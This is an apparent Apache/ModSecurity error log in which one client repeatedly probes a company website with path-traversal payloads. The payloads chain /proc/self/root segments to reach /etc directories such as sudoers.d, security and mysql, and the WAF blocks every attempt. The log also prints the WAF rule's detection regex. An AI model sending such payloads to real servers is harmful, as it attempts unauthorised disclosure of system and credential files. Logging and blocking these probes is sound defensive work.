[Tue Mar 17 14:30:12.284173 2026] [:error] [pid 7437:tid 140411574073088] [client 74.7.241.31:57576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPpAeiSKl8TjouI-YbXQAAA9Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:30:13.568486 2026] [:error] [pid 29151:tid 140411708356352] [client 74.7.241.31:57586] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPpfPqhzTj3BvfDX-JtwAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:30:14.928763 2026] [:error] [pid 18380:tid 140411565680384] [client 74.7.241.31:57602] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPpq4xEDsg_V3ESNZOKgAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:30:17.968776 2026] [:error] [pid 9299:tid 140411733534464] [client 74.7.241.31:57606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPqb-sgTmmJoPuMdy4HwAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:30:19.554833 2026] [:error] [pid 9299:tid 140411582465792] [client 74.7.241.31:47198] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPq7-sgTmmJoPuMdy4IwAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:30:20.870145 2026] [:error] [pid 29151:tid 140411725141760] [client 74.7.241.31:47204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPrPPqhzTj3BvfDX-JvQAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:30:22.146966 2026] [:error] [pid 2598:tid 140411632822016] [client 74.7.241.31:47218] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPrhj0p0SRWAqcjGF7OgAAAw0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:30:23.471089 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.241.31:47224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPr9Y0UrI5A3LftIz9wgAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:30:24.955759 2026] [:error] [pid 29151:tid 140411599251200] [client 74.7.241.31:47226] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPsPPqhzTj3BvfDX-JwwAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:30:26.403061 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.241.31:47232] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPstY0UrI5A3LftIz9yAAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:30:28.128047 2026] [proxy_fcgi:error] [pid 17965:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37628] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:30:29.035225 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.241.31:53860] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPtQeiSKl8TjouI-YbagAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:30:31.472531 2026] [:error] [pid 17965:tid 140411683178240] [client 74.7.241.31:53868] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPt6t8Nd0UC_OcbVHMlgAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:30:32.747906 2026] [:error] [pid 9299:tid 140411683178240] [client 74.7.241.31:53884] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPuL-sgTmmJoPuMdy4JwAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:30:48.591424 2026] [:error] [pid 18380:tid 140411699963648] [client 74.7.241.31:53894] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPyK4xEDsg_V3ESNZOSwAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:30:50.061874 2026] [proxy_fcgi:error] [pid 7004:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37962] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:30:50.256695 2026] [:error] [pid 6296:tid 140411708356352] [client 74.7.241.31:59122] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPynIk7brgkOH-rIWNiAAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:30:51.578667 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.241.31:59138] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPyweiSKl8TjouI-YbegAAA8E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:30:52.879298 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.241.31:59152] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPzKBJNF7axNlVR0UZcQAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:30:54.165090 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.241.31:59164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPzqBJNF7axNlVR0UZcwAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:04.513284 2026] [:error] [pid 2598:tid 140411699963648] [client 74.7.241.31:59180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP2Bj0p0SRWAqcjGF7TwAAAwU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:05.811002 2026] [:error] [pid 2598:tid 140411582465792] [client 74.7.241.31:49984] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP2Rj0p0SRWAqcjGF7UgAAAxM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:31:07.214334 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.241.31:49994] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmP26BJNF7axNlVR0UZdwAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
